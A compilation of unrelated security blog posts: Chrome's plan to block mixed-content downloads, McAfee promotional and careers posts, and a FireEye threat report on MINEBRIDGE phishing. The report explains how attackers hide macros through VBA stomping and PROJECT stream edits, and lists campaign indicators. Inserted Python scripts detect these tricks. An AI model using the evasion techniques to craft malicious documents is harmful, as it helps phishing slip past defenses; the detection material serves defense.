Protecting large volumes of data moving across a vast multi-user network against these vulnerabilities and threats calls for a security strategy that is simple, scalable and uncomplicated, in order to avoid any disruption of critical infrastructure services provided to businesses or citizens, and to remain compliant with governmental cybersecurity regulations and/or codes of practice.

Whereas traditional Layer 2 and Layer 3 encryption methods are often disruptive and complex, a Layer 4 solution encrypts the payload of data in transit while leaving the network and transport headers that routers, firewalls and monitoring tools rely on readable, independent of network applications and without having to move, replace or disrupt the network infrastructure. This is a significant saving in resources, time and budget.

In addition, network blind spots due to problems, outages, and cyber-criminals using encryption to conceal malware, increase network security risk and are potential regulatory compliance issues. According to a recent survey from Vanson Bourne[i], roughly two-thirds, or 67 percent, of organisations say that network blind spots are one of the biggest challenges they face when trying to protect their data.

With network monitoring one of the strongest defences against blind spots, Layer 4 encryption and encryption management tools preserve network visibility by keeping a close and constant eye on network traffic. Network visibility tools allow existing applications and network performance tools to keep working after encryption is turned on, without blinding the network.

Finally, adding in network observability allows smart cities to analyse and gain deeper understanding of network policy deployment and policy enforcement by scrutinising every application that tries to communicate across the network, all the while monitoring pathways for potential threats now that each policy is observable in real-time. 

Conclusion

For organisations and teams tasked with implementing smart technology in residential, commercial and public spaces, plans on how to do so will have to be part of the design and planning stage – including how we securely implement and maintain these smart spaces. It is integral that all connected aspects of smart cities have undergone extensive planning and design, with a smart city architecture for service key management at the core. Defining standards and enforceable policies that can be analysed to help identify network vulnerabilities and thwart potential threats is critical.


Providing better technology is an ever-evolving, fast-paced race and caution should be given to those cities who move so fast that they risk building an infrastructure without equally giving precedence to the protection of data of those who work and live in their city.

Related: my IBM Developer article ‘Combating IoT Cyber Threats’.

Protecting users from insecure downloads in Google Chrome

Update (04/06/2020): Chrome was originally scheduled to start user-visible warnings on mixed downloads in Chrome 82. These warnings, as well as subsequent blocking, will be delayed by at least two releases. Console warnings on mixed downloads will begin as scheduled in Chrome 81.

At this time, we expect to start user-visible warnings in Chrome 84. The Chrome Platform Status entry will be kept up-to-date as timing is finalized. Developers who are otherwise able to do so are encouraged to transition to secure downloads as soon as possible to avoid future disruption.


Today we’re announcing that Chrome will gradually ensure that secure (HTTPS) pages only download secure files. In a series of steps outlined below, we’ll start blocking "mixed content downloads" (non-HTTPS downloads started on secure pages). This move follows a plan we announced last year to start blocking all insecure subresources on secure pages.

Insecurely-downloaded files are a risk to users' security and privacy. For instance, insecurely-downloaded programs can be swapped out for malware by attackers, and eavesdroppers can read users' insecurely-downloaded bank statements. To address these risks, we plan to eventually remove support for insecure downloads in Chrome.

As a first step, we are focusing on insecure downloads started on secure pages. These cases are especially concerning because Chrome currently gives no indication to the user that their privacy and security are at risk.

Starting in Chrome 82 (to be released April 2020), Chrome will gradually start warning on, and later blocking, these mixed content downloads. File types that pose the most risk to users (e.g., executables) will be impacted first, with subsequent releases covering more file types. This gradual rollout is designed to mitigate the worst risks quickly, provide developers an opportunity to update sites, and minimize how many warnings Chrome users have to see.

We plan to roll out restrictions on mixed content downloads on desktop platforms (Windows, macOS, Chrome OS and Linux) first. Our plan for desktop platforms is as follows:

  • In Chrome 81 (released March 2020) and later:
    • Chrome will print a console message warning about all mixed content downloads.
  • In Chrome 82 (released April 2020):
    • Chrome will warn on mixed content downloads of executables (e.g. .exe).
  • In Chrome 83 (released June 2020):
    • Chrome will block mixed content executables
    • Chrome will warn on mixed content archives (.zip) and disk images (.iso).
  • In Chrome 84 (released August 2020):
    • Chrome will block mixed content executables, archives and disk images
    • Chrome will warn on all other mixed content downloads except image, audio, video and text formats.
  • In Chrome 85 (released September 2020):
    • Chrome will warn on mixed content downloads of images, audio, video, and text
    • Chrome will block all other mixed content downloads
  • In Chrome 86 (released October 2020) and beyond, Chrome will block all mixed content downloads.
[Image: example of a potential warning]
Chrome will delay the rollout for Android and iOS users by one release, starting warnings in Chrome 83. Mobile platforms have better native protection against malicious files, and this delay will give developers a head-start towards updating their sites before impacting mobile users.
Developers can prevent users from ever seeing a download warning by ensuring that downloads only use HTTPS. In the current version of Chrome Canary, or in Chrome 81 once released, developers can activate a warning on all mixed content downloads for testing by enabling the "Treat risky downloads over insecure connections as active mixed content" flag at chrome://flags/#treat-unsafe-downloads-as-active-content.
Enterprise and education customers can disable blocking on a per-site basis via the existing InsecureContentAllowedForUrls policy by adding a pattern matching the page requesting the download.
In the future, we expect to further restrict insecure downloads in Chrome. We encourage developers to fully migrate to HTTPS to avoid future restrictions and fully protect their users. Developers with questions are welcome to email us at security-dev@chromium.org.
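A site owner can find the links that will trip these warnings before Chrome does. The following is an added example, not code from the Chrome team or this post: it parses the anchors of an HTTPS page, keeps those whose absolute URL is plain http://, classifies each by extension, and maps it to the original desktop schedule listed above (console message from 81, then warn, then block). Only .exe, .zip and .iso are named in the post; the other extensions in the mapping, the sample page and the `cdn.example.test` URLs are assumptions for the demonstration.

```python
"""Flag mixed-content downloads (http:// links on an https:// page) and map each one
to Chrome's desktop rollout schedule (console message, warn, block) by file class."""
import posixpath
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Release in which a mixed download of each class is first blocked, from the schedule
# in the post. The release before it is the "warn" release; Chrome 81+ logs a console
# message for every mixed download.
BLOCK_RELEASE = {
    "executable": 83,
    "archive": 84,
    "disk_image": 84,
    "other": 85,
    "media_or_text": 86,
}

# Extension-to-class mapping. .exe, .zip and .iso are named in the post; the remaining
# entries are assumed examples of the "image, audio, video and text" group, not
# Chrome's actual classification list.
EXT_CLASS = {
    ".exe": "executable",
    ".zip": "archive",
    ".iso": "disk_image",
    ".png": "media_or_text", ".jpg": "media_or_text", ".gif": "media_or_text",
    ".mp3": "media_or_text", ".mp4": "media_or_text", ".txt": "media_or_text",
}


class LinkCollector(HTMLParser):
    """Collect href values of <a> elements; downloads start from links like these."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.hrefs.append(value)


def classify(url):
    """Map a download URL to one of the schedule's file classes by its extension."""
    ext = posixpath.splitext(urlparse(url).path)[1].lower()
    return EXT_CLASS.get(ext, "other")


def chrome_action(file_class, chrome_version):
    """What the given desktop Chrome release does with a mixed download of this class."""
    block_at = BLOCK_RELEASE[file_class]
    if chrome_version >= block_at:
        return "block"
    if chrome_version == block_at - 1:
        return "warn"
    if chrome_version >= 81:
        return "console-warning"
    return "none"


def find_mixed_downloads(page_url, html, chrome_version):
    """Return (absolute_url, file_class, action) for every http:// link on an https:// page.

    A page served over plain http:// has no mixed-content downloads by definition,
    so an empty list is returned for it.
    """
    if urlparse(page_url).scheme != "https":
        return []
    parser = LinkCollector()
    parser.feed(html)
    findings = []
    for href in parser.hrefs:
        absolute = urljoin(page_url, href)
        if urlparse(absolute).scheme != "http":
            continue  # https://, mailto: and relative (same-origin) links are not mixed content
        cls = classify(absolute)
        findings.append((absolute, cls, chrome_action(cls, chrome_version)))
    return findings


# Constructed sample page: one same-origin relative link and three insecure absolute links.
SAMPLE_PAGE_URL = "https://downloads.example.test/"
SAMPLE_HTML = """
<a href="http://cdn.example.test/setup.exe">Installer</a>
<a href="/files/data.zip">Data (same origin, stays https)</a>
<a href="http://cdn.example.test/photo.png">Photo</a>
<a href="http://cdn.example.test/manual.pdf">Manual</a>
<a href="mailto:help@example.test">Contact</a>
"""

if __name__ == "__main__":
    for url, cls, action in find_mixed_downloads(SAMPLE_PAGE_URL, SAMPLE_HTML, 84):
        print(f"{action:16} {cls:14} {url}")
```

Running it against Chrome 84 flags the installer as blocked, the PDF as warned on and the image as console-only. Note that the schedule encoded here is the one in the list above; the update at the top of the post says the user-visible steps slipped by at least two releases, so adjust `BLOCK_RELEASE` to the current Chrome Platform Status entry before relying on the version numbers.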

Leading with Cloud Security, Empowering Enterprise Innovation

Call it ancient history—2012. When sanctioned apps ruled the day. Shadow IT lurked, well, in the shadows. And protecting the enterprise meant locking down the cloud. Then, true to the principles of Darwinian evolution, enterprises began to adapt to the new natural order.

Let the record show, 97% of enterprises in 2020 rely on the cloud for some combination of SaaS, IaaS, or PaaS solutions to power their enterprise. Which is why McAfee’s cloud-led strategy to serve the enterprise is centered on an organization’s ability to protect data and workloads, whether in use, in motion, or at rest. President and CEO of McAfee, Peter Leav, puts it this way, “We are in a new world. There is simply more. More networks, more endpoints, more users, more applications, more data, more cloud.”

SaaS solutions make the enterprise agile, whether via collaboration tools like Slack or Box, relationship management and marketing automation technologies like Salesforce, or technical management from companies like ServiceNow. Agility is the name of the game, and the enterprise that moves fastest wins the day. And with IaaS and PaaS enabled by the likes of AWS, Microsoft Azure, and Google Cloud Platform, the evolution of the enterprise only accelerates.

McAfee is proud to lead at the front of the cloud revolution. Our award-winning MVISION Cloud created the Cloud Access Security Broker (CASB) category nearly a decade ago. And we’ve only built on our successes in the cloud from there, including 14 seminal patents (3X more than our nearest competitor). The Analyst community agrees—It’s gratifying to be named a Leader in reports by three influential analyst firms.

We built on our leadership in 2019 when McAfee acquired NanoSec, an innovator in zero-trust application visibility and security for multi-cloud environments. NanoSec enables organizations to secure applications once and run them on any cloud infrastructure at scale. But there’s more. NanoSec also provides McAfee cloud users the latest in container security. When you add NanoSec’s capabilities to McAfee’s existing cloud security portfolio, you can see that we now bring consistent data security, threat protection, governance, and compliance to virtually every element and every environment of the cloud.

Further proof of our cloud-led momentum unfolded in 2019 as MVISION Cloud was certified as a natively-integrated cloud solution for consumers, businesses, and governments by global leaders in the IaaS and PaaS arena. Specifically, McAfee was recognized by AWS as a Well-Architected Partner for our CASB and IPS solutions, as well as a Security Competency Partner for CASB, all to offer the same security controls available in a private data center. What’s more, AWS called out McAfee as an ISV Accelerator Partner for CASB, and an Amazon RDS Partner for McAfee Database Security. Microsoft likewise recognized our CASB leadership with its integration of MVISION Cloud with MS Teams. Microsoft and McAfee also partner through Office 365 Collaboration Controls to ensure security and compliance, and our virtual Advanced Threat Defense is on the Azure Marketplace. In November, Google Cloud Platform (GCP) announced MVISION Cloud’s integration into GCP for visibility and control of cloud resources. And McAfee is trusted by the U.S. government as a FedRAMP Moderate Authorized and FedRAMP Ready for FedRAMP High partner via our MVISION Cloud, Extended Threat Protection, Cloud Value Maturity, and End User Remediation solutions. We also enjoy FedRAMP Moderate In-Process status for MVISION Endpoint on the FedRAMP Marketplace.

Still, as rewarding as it is to be recognized by partners like AWS, MS, GCP, and FedRAMP, our customers’ successes are the real story. WEG is a perfect example. The multi-national manufacturing company headquartered in Brazil currently deploys McAfee® Client Proxy, McAfee® MVISION Cloud for Office 365, McAfee® Web Gateway, and McAfee® Web Gateway Cloud Service. This unified approach to cloud helps address WEG’s three biggest cybersecurity concerns, namely secure internet access, secure cloud access, and secure intellectual property. Pierre Pereira Rodrigues, CISO for WEG, puts it this way, “Our business users have been pushing for greater cloud adoption. Rather than wearing the ‘No, you can’t’ cybersecurity hat, we strive to say, ‘Let’s figure out how you can.’” The result is proof that a business can be innovative and not sacrifice security.

Maka Guerrero, Senior IT Security Analyst at Pacific Dental Services says, “MVISION Cloud allows us to have more flexibility on the fly than any other CASB on the market. The approach that McAfee is taking to secure the cloud aligns really well with our other partners like AWS and what they are trying to achieve, and it makes sense for our business goals.” A provider of administrative support to dental offices across the U.S., PDS deploys MVISION Cloud for AWS, MVISION Cloud for Box, MVISION Cloud for Custom Apps, MVISION Cloud for Office 365, MVISION Cloud for Salesforce, and MVISION Cloud for Shadow IT.

It’s customers like these—frontline defenders of this new digital age—who are writing tomorrow’s history, today. McAfee is proud to stand at their side even as our adversary pushes the limits of an equally Darwinian transformation of the threatscape.

With the scale, speed, and agility of the cloud on our side, let the new world continue to evolve.

The post Leading with Cloud Security, Empowering Enterprise Innovation appeared first on McAfee Blogs.

McAfee’s Women in Security Offer New Grads Career Insights

Launching your career is an exciting milestone, one that can also be nerve-wracking though. Chances are questions like What should I look for in a company? or How do I become a leader? have crossed your mind.

While we can’t answer all your questions, our Women in Security (WISE) employee resource group offered to host a panel discussion to encourage the next generation of women in tech to pursue their passions. Students asked questions about what it’s like to work in the technology industry, the importance of mentorship, overcoming imposter syndrome, achieving success early in career, and about life here at McAfee.

Here’s how they responded:

How did you build success early in your career?

Amanda, Data Scientist: “I quickly found that learning never stops. While a degree helps you build the foundation, real knowledge comes from exposure and experience. Take every challenge and opportunity thrown your way. Early in your career is the best time to take risks and just say yes.”

Flavia, IT Manager: “In everything I do, I keep three principles at the forefront: communication, awareness, and accountability. If you have these skills, you will succeed at any role.”

JoAnne, Cloud Application Engineer: “When it’s early in your career, you can build success by trying new tasks outside of your normal job duties. Do your best and take advantage of each opportunity. And remember, have fun along the way.”

How do you handle imposter syndrome?

Bolade, Sales Engineer: “Everyone faces self-doubt. As a woman, and a woman of a diverse background, I’ve faced imposter syndrome. You must fight through it and recognize that it’s only the voice in your head. To help you silence the doubt, reach out to your network and your mentor. Mentorship is an important part in building your confidence.”

Crystal, Talent Enablement Leader: “First, recognize that any negative thoughts are just that—thoughts. Acknowledge them and then instead of letting them make you feel unqualified, use them to empower you. Take action to fill any areas of improvement. You will face adversity in your career, but take them as lessons learned, gain perspective, and then move forward.”

How do you chart a path to leadership?

Crystal, Talent Enablement Leader: “Take time to research the role you want to be in. What will it take to get there? Know it’s not always a linear path though. It’s okay to take steps backwards or sideways when they help you achieve your long-term plan. Humble yourself for the journey.”

Sonia, Sr. Product Marketing Manager: “Start with a vision board and work towards the small wins to help you reach your goals. Also, keep in mind research tells us men and women approach opportunities differently. As women, we wait until we feel 100 percent qualified for the job, while men apply believing they will learn on the job. My advice to all women seeking any role and leadership is to just go for it—you are capable. Recognizing you can and will learn on the job is an important part of your success.”

Why McAfee?

Bolade, Sales Engineer: “The people. Not long after I started at McAfee, I took on another important role—motherhood. My leadership was incredibly supportive and when I returned from leave, I was promoted within six months. You can’t get where you want to be without good people to help you get there. I’ve found the supportive team I have at McAfee is critical to my fulfilment both personally and professionally.”

Sonia, Sr. Product Marketing Manager: “Here, I feel like I have family. I love how everyone always exchanges hellos in the elevator. Something small like this makes a big difference in your day. Working with a great team in a great environment is one of the most important things that helps you succeed, and I’ve found that at McAfee.”

Interested in building your career at a company that helps women thrive? Search our openings!

The post McAfee’s Women in Security Offer New Grads Career Insights appeared first on McAfee Blogs.

Enterprise security in 2020: How to keep attackers out

Securing the enterprise is no easy task. With a huge workforce to train, hundreds or even thousands of devices to manage and protect, and forever evolving security threats – the job never stands still.

CSOs and CISOs rely on their strong network of information to keep their organization as secure as possible. IDG TECH(Talk) led a Twitter discussion, plus a live-streamed video, with security experts and tech industry watchers to talk about the state of enterprise security in 2020 and how to keep attackers out.


STOMP 2 DIS: Brilliance in the (Visual) Basics

Throughout January 2020, FireEye has continued to observe multiple targeted phishing campaigns designed to download and deploy a backdoor we track as MINEBRIDGE. The campaigns primarily targeted financial services organizations in the United States, though targeting is likely more widespread than those we’ve initially observed in our FireEye product telemetry. At least one campaign targeted South Korean organizations, including a marketing agency.

In these campaigns, the phishing documents appeared to be carefully crafted and leveraged some publicly-documented — but in our experience uncommon and misunderstood — TTPs, likely in an effort to decrease detection of the malicious documents’ macros. The actor also used a self-hosted email marketing solution across multiple campaigns. Notably, the payload delivered in these campaigns leveraged a packer previously affiliated with a commonly-tracked threat actor, an overlap that we will explore later.

This blog post will review the theme of these campaigns and their targets, the adversary’s unique tradecraft, the MINEBRIDGE C++ backdoor, some potential attribution overlaps, and importantly — the threat actor’s love of rap music.

Targeting and Lure Detail

While we first identified MINEBRIDGE samples in December, we observed our first phishing campaigns relating to this activity in early January 2020. Email addresses used to send phishing messages were associated with domains that appear to have been registered specifically for this purpose within a few weeks of the activity — and were thematically consistent with the content of the phishing messages.

Additionally, the actor(s) responsible are likely using a self-hosted email marketing solution called Acelle. Acelle adds extended email headers to messages sent via the platform in the format of X-Acelle-<variable>. The messages observed across campaigns using these TTPs have included a “Customer-Id” value matching “X-Acelle-Customer-Id: 5df38b8fd5b58”. While that field remained consistent across all observed campaigns, individual campaigns also shared overlapping “X-Acelle-Sending-Server_Id” and “X-Acelle-Campaign-Id” values. All of the messages also included a “List-Unsubscribe” header offering a link hosted at 45.153.184.84 suggesting that it is the server hosting the Acelle instance used across these campaigns. The sample table for one campaign below illustrates this data:

| Timestamp | Sender | Subject | x-acelle-subscriber-id | x-acelle-sending-server-id | x-acelle-customer-id | x-acelle-campaign-id |
|---|---|---|---|---|---|---|
| 1/7/20 16:15 | info@rogervecpa.com | tax return file | 25474792e6f8c | 5e14a2664ffb4 | 5df38b8fd5b58 | 5e14a2664ffb4 |
| 1/7/20 15:59 | info@rogervecpa.com | tax return file | 22e183805a051 | 5e14a2664ffb4 | 5df38b8fd5b58 | 5e14a2664ffb4 |
| 1/7/20 | info@rogervecpa.com | tax return file | 657e1a485ed77 | 5e14a2664ffb4 | 5df38b8fd5b58 | 5e14a2664ffb4 |
| 1/7/20 16:05 | info@rogervecpa.com | tax return file | ddbbffbcb5c6c | 5e14a2664ffb4 | 5df38b8fd5b58 | 5e14a2664ffb4 |

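The X-Acelle-* headers are a useful pivot for mail-gateway hunting because the Customer-Id identifies the sending tenant regardless of sender domain or campaign. The block below is an added example (not FireEye tooling): it parses raw messages with the standard library, pulls every X-Acelle-* header plus the List-Unsubscribe host, clusters messages by Customer-Id, and checks each against the two indicators quoted above (Customer-Id 5df38b8fd5b58 and host 45.153.184.84). The sample messages are constructed; their subscriber and campaign ids marked CONSTRUCTED-* are invented, the others are copied from the table.

```python
"""Pivot on Acelle extended headers to cluster phishing messages by sending tenant."""
import email
import re
from collections import defaultdict
from email import policy
from urllib.parse import urlparse

# Indicators quoted in the post: the Customer-Id shared by every observed campaign
# and the host serving the List-Unsubscribe link.
KNOWN_CUSTOMER_ID = "5df38b8fd5b58"
KNOWN_UNSUBSCRIBE_HOST = "45.153.184.84"


def acelle_fingerprint(raw_message):
    """Extract every X-Acelle-* header plus the List-Unsubscribe host from one raw message."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    fp = {
        "from": str(msg.get("From", "")),
        "subject": str(msg.get("Subject", "")),
        "unsubscribe_host": None,
    }
    for name, value in msg.items():
        if name.lower().startswith("x-acelle-"):
            fp[name.lower()] = str(value).strip()
    match = re.search(r"<([^>]+)>", str(msg.get("List-Unsubscribe", "")))
    if match:
        fp["unsubscribe_host"] = urlparse(match.group(1)).hostname
    return fp


def matches_known_infrastructure(fp):
    """True when the message carries either indicator from the post."""
    return (fp.get("x-acelle-customer-id") == KNOWN_CUSTOMER_ID
            or fp.get("unsubscribe_host") == KNOWN_UNSUBSCRIBE_HOST)


def cluster_by_customer(raw_messages):
    """Group messages by X-Acelle-Customer-Id: one tenant, many campaigns and subscribers."""
    clusters = defaultdict(list)
    for raw in raw_messages:
        fp = acelle_fingerprint(raw)
        customer = fp.get("x-acelle-customer-id")
        if customer:
            clusters[customer].append(fp)
    return dict(clusters)


def _message(headers, body="Please find the attached file."):
    """Build a minimal raw RFC 822 message from (header, value) pairs."""
    return "\r\n".join(f"{k}: {v}" for k, v in headers) + "\r\n\r\n" + body


# Constructed samples: two messages reusing the post's Customer-Id and unsubscribe host
# (one from each observed sender domain) and one unrelated newsletter from another tenant.
SAMPLE_MESSAGES = [
    _message([
        ("From", "info@rogervecpa.com"),
        ("Subject", "tax return file"),
        ("X-Acelle-Customer-Id", KNOWN_CUSTOMER_ID),
        ("X-Acelle-Campaign-Id", "5e14a2664ffb4"),
        ("X-Acelle-Sending-Server-Id", "5e14a2664ffb4"),
        ("X-Acelle-Subscriber-Id", "25474792e6f8c"),
        ("List-Unsubscribe", f"<http://{KNOWN_UNSUBSCRIBE_HOST}/unsubscribe/aaaa>"),
    ]),
    _message([
        ("From", "hr@agent4career.com"),
        ("Subject", "candidate resume"),
        ("X-Acelle-Customer-Id", KNOWN_CUSTOMER_ID),
        ("X-Acelle-Campaign-Id", "CONSTRUCTED-CAMPAIGN-2"),
        ("X-Acelle-Sending-Server-Id", "5e14a2664ffb4"),
        ("X-Acelle-Subscriber-Id", "CONSTRUCTED-SUB-2"),
        ("List-Unsubscribe", f"<http://{KNOWN_UNSUBSCRIBE_HOST}/unsubscribe/bbbb>"),
    ]),
    _message([
        ("From", "news@newsletter.example.test"),
        ("Subject", "Monthly update"),
        ("X-Acelle-Customer-Id", "CONSTRUCTED-OTHER-TENANT"),
        ("X-Acelle-Campaign-Id", "CONSTRUCTED-CAMPAIGN-3"),
        ("List-Unsubscribe", "<https://newsletter.example.test/unsub>"),
    ]),
]

if __name__ == "__main__":
    for customer, messages in cluster_by_customer(SAMPLE_MESSAGES).items():
        flagged = any(matches_known_infrastructure(fp) for fp in messages)
        print(f"{customer}: {len(messages)} message(s), known infrastructure: {flagged}")
```

Clustering on the tenant id rather than the sender domain is what ties the tax-themed and recruiting-themed campaigns together even though their From addresses differ; the unsubscribe host is a second, independent pivot should the actor move to a new Acelle account.
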
The URLs requested by the malicious documents and serving the final MINEBRIDGE payloads delivered in each of these campaigns provide additional overlap across campaigns. In all observed cases, the domains used the same bullet-proof hosting service. The URI used to download the final payload was “/team/invest.php” or, in one case, “/team/rumba.php”. Perhaps the most fun overlap, however, was discovered when trying to identify additional artifacts of interest hosted at similar locations. In most cases a GET request to the parent directory of “/team/” on each of the identified domains served up the lyrics to rap group Onyx’s “Bang 2 Dis” masterpiece. We will refrain from sharing the specific verse hosted due to explicit content.

One of the more notable characteristics of this activity was the consistency in themes used for domain registration, lure content, similarities in malicious document macro content, and targeting. Since first seeing these emails, we’ve identified at least 3 distinct campaigns.

Campaign #1: January 7, 2020 – Tax Theme
  • Emails associated with this campaign used the CPA themed domain rogervecpa.com registered in late November and the subject line “Tax Return File” with IRS related text in the message body.
  • The attached payload was crafted to look like an H&R Block related tax form.
  • Observed targeting included the financial sector exclusively.

Campaign #2: January 8, 2020 – Marketing Theme
  • Emails associated with this campaign used the same CPA themed domain rogervecpa.com along with pt-cpaaccountant.com, also registered late November.
  • The subject line and message body offered a marketing partnership opportunity to the victim.
  • The attached payload used a generic theme enticing users to enable macro content.
  • Observed targeting focused on a South Korean marketing agency.

Campaign #3: January 28, 2020 – Recruiting Theme
  • Emails associated with this campaign were sent from several different email addresses, though all used the recruiting-themed domain agent4career.com which was registered on January 20, 2020.
  • The subject line and message body referenced an employment candidate with experience in the financial sector.
  • The attached payload masqueraded as the resume of the same financial services candidate referenced in the phishing email.
  • Observed targeting included the financial sector exclusively.

Quit Stepping All Over My Macros

The phishing documents themselves leverage numerous interesting TTPs including hiding macros from the Office GUI, and VBA stomping.

VBA stomping is a colloquial term applied to the manipulation of Office documents where the source code of a macro is made to mismatch the pseudo-code (hereafter referred to as "p-code") of the document. In order to avoid duplicating research and wasting the reader’s time, we will instead reference the impressive work of our predecessors and peers in the industry. As an introduction to the concept, we first recommend reading the tool release blog post for EvilClippy from Outflank. The security team at Walmart has also published incredible research on the methodology. Vesselin Bontchev provides a useful open source utility for dumping the p-code from an Office document in pcodedmp. This tool can be leveraged to inspect the p-code of a document separate from its VBA source. It was adopted by the wider open source analysis toolkit oletools in order to detect the presence of stomping via comparison of p-code mnemonics against keyword extraction from the VBA source.

That is a whole lot of quality reading for those interested. For the sake of brevity, the most important result of VBA stomping as relevant to this blog post is the following:

  • Static analysis tools focusing on VBA macro source extraction may be fooled into a benign assessment of a document bearing malicious p-code.
  • When VBA source is removed, and a document is opened in a version of Office for which the p-code was not compiled to execute, a macro will not execute correctly, resulting in potential failed dynamic analysis.
  • When a document is opened under a version of Office that uses a VBA version that does not match the version of Office used to create the document, VBA source code is recompiled back into p-code.
  • When a document is opened in Office and the GUI is used to view the macro, the embedded p-code is decompiled to be viewed.

The final two points identify some interesting complications in regard to leveraging this methodology more broadly. Versioning complexities arise that toolkits like EvilClippy leverage Office version enumeration features to address. An actor’s VBA stomped document containing benign VBA source but evil p-code must know the version of Office to build the p-code for, or their sample will not detonate properly. Additionally, if an actor sends a stomped document, and a user or researcher opens the macro in the Office editor, they will see malicious code.

Our actor addressed the latter point of this complication by leveraging what we assess to be another feature of the EvilClippy utility, wherein viewing the macro source is made inaccessible to a user within Office by modifying the PROJECT stream of the document. Let’s highlight this below using a publicly available sample we attribute to our actors (SHA256: 18698c5a6ff96d21e7ca634a608f01a414ef6fbbd7c1b3bf0f2085c85374516e):

Document PROJECT stream:

ID="{33C06E73-23C4-4174-9F9A-BA0E40E57E3F}"
Document=ThisDocument/&H00000000
Name="Project"
HelpContextID="0"
VersionCompatible32="393222000"
CMG="A3A1799F59A359A359A359A3"
DPB="87855DBBA57B887C887C88"
GC="6B69B1A794A894A86B"
[Host Extender Info]
&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000
[Workspace]
ThisDocument=0, 0, 0, 0, C
Module1=26, 26, 388, 131, Z

The above PROJECT stream has been modified. Within the PROJECT stream workspace, a module is referenced. However, there is no module defined. We would expect the unmodified PROJECT stream of this document prior to utilization of a tool to modify it to be as follows:

ID="{33C06E73-23C4-4174-9F9A-BA0E40E57E3F}"
Document=ThisDocument/&H00000000
Module="Module1"
Name="Project"
HelpContextID="0"
VersionCompatible32="393222000"
CMG="A3A1799F59A359A359A359A3"
DPB="87855DBBA57B887C887C88"
GC="6B69B1A794A894A86B"
[Host Extender Info]
&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000
[Workspace]
ThisDocument=0, 0, 0, 0, C
Module1=26, 26, 388, 131, Z

It is interesting to note that we initially identified this actor performing only this PROJECT stream manipulation on their malicious documents, avoiding any versioning complexities, without actually stomping the p-code to mismatch the VBA source. This seems like an odd decision and is possibly indicative of an actor assessing what “works” for their campaigns. The above malicious document is an example of them leveraging both methodologies, as highlighted by this screenshot from the awesome publicly available web service IRIS-H Digital Forensics:

We can see that the document’s VBA source is a blank Sub procedure definition. A quick glance at the p-code identifies both network-based and host-based indicators we can use to determine what this sample would do when executed on the proper Office version. When we attempt to open the macro in the GUI editor, Office gets angry:

For analysts looking to identify this methodology holistically, we recommend the following considerations:

  • The GUI-hiding functionality leaves an altered PROJECT stream in which the [Workspace] section references a module, but no Module, Class, or BaseClass entry in the stream defines it. This is a potential static detection.
  • While the macro source is no longer present, static strings remain in Module1 in this sample that may indicate the Windows APIs leveraged. This is a potential static detection.

  • Utilities like the previously mentioned oletools can do all of this detection for you. If you identify false negatives, false positives, or bugs, the open source project maintainers respond to them regularly like the superheroes that they are:
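The first detection above is cheap to implement directly. The following added example (not part of the post or of oletools) parses a PROJECT stream the way the two listings above are laid out: top-level `Document=`, `Module=`, `Class=` and `BaseClass=` keys declare components, and the `[Workspace]` section references them by name; any workspace name without a declaration is reported. The two sample streams are copies of the manipulated and expected streams shown above; in a real document the stream would be read from the VBA storage first (olefile can do that) and passed in as text.

```python
"""Static check for the PROJECT stream manipulation described above: a [Workspace]
entry that names a module the stream never declares."""

# Top-level keys that declare a VBA component; the value carries the component name.
DEFINING_KEYS = {"Module", "Class", "BaseClass", "Document"}


def parse_project_stream(text):
    """Return (set of declared component names, list of names referenced in [Workspace])."""
    declared = set()
    workspace = []
    section = None
    for raw_line in text.splitlines():
        line = raw_line.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        if section is None and key in DEFINING_KEYS:
            # Document=ThisDocument/&H00000000 -> ThisDocument; Module="Module1" -> Module1
            # (curly quotes are stripped too, since extracted listings often carry them)
            name = value.split("/", 1)[0].strip().strip('"\u201c\u201d')
            declared.add(name)
        elif section == "workspace":
            workspace.append(key)
    return declared, workspace


def undeclared_workspace_modules(text):
    """Names listed under [Workspace] with no Module/Class/BaseClass/Document declaration."""
    declared, workspace = parse_project_stream(text)
    return [name for name in workspace if name not in declared]


# Constructed copy of the manipulated stream shown above (no Module= line for Module1).
STOMPED_PROJECT = """ID="{33C06E73-23C4-4174-9F9A-BA0E40E57E3F}"
Document=ThisDocument/&H00000000
Name="Project"
HelpContextID="0"
VersionCompatible32="393222000"
CMG="A3A1799F59A359A359A359A3"
DPB="87855DBBA57B887C887C88"
GC="6B69B1A794A894A86B"
[Host Extender Info]
&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000
[Workspace]
ThisDocument=0, 0, 0, 0, C
Module1=26, 26, 388, 131, Z
"""

# The expected, unmodified stream: identical except for the Module="Module1" declaration.
INTACT_PROJECT = STOMPED_PROJECT.replace(
    "Document=ThisDocument/&H00000000\n",
    'Document=ThisDocument/&H00000000\nModule="Module1"\n', 1)

if __name__ == "__main__":
    for label, stream in (("stomped", STOMPED_PROJECT), ("intact", INTACT_PROJECT)):
        missing = undeclared_workspace_modules(stream)
        print(f"{label}: {'SUSPICIOUS ' + str(missing) if missing else 'ok'}")
```

A hit from this check is a strong signal on its own: Office writes the declaration and the workspace entry together, so a workspace reference without a declaration is not something a normal save produces.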

The above methodology creates questions regarding potential efficiency problems for scaling any sizable campaign using it. While tools like EvilClippy provide the means to create difficult to detect malicious documents that can potentially sneak past some dynamic and static detections, their payloads have the additional burden of needing to fingerprint targets to enable successful execution. While actors with sufficient resources and creativity can no doubt account for these requirements, it is relevant to note that detections for these methodologies will likely yield more targeted activity. In fact, tertiary review of samples employing these techniques identified unrelated activity delivering both Cobalt Strike BEACON and POSHC2 payloads.

We recently expanded our internal FireEye threat behavior tree to accommodate these techniques. At the time of publication, the authors were unable to directly map the methods – PROJECT stream manipulation and VBA stomping – to existing techniques in the MITRE ATT&CK Matrix™ for Enterprise. However, our team submitted these as contributions to the ATT&CK knowledge base prior to publication and will make additional data available for ATT&CK Sightings.

Crossing The Bridge of Khazad-dûm: The MINEBRIDGE Infection Chain

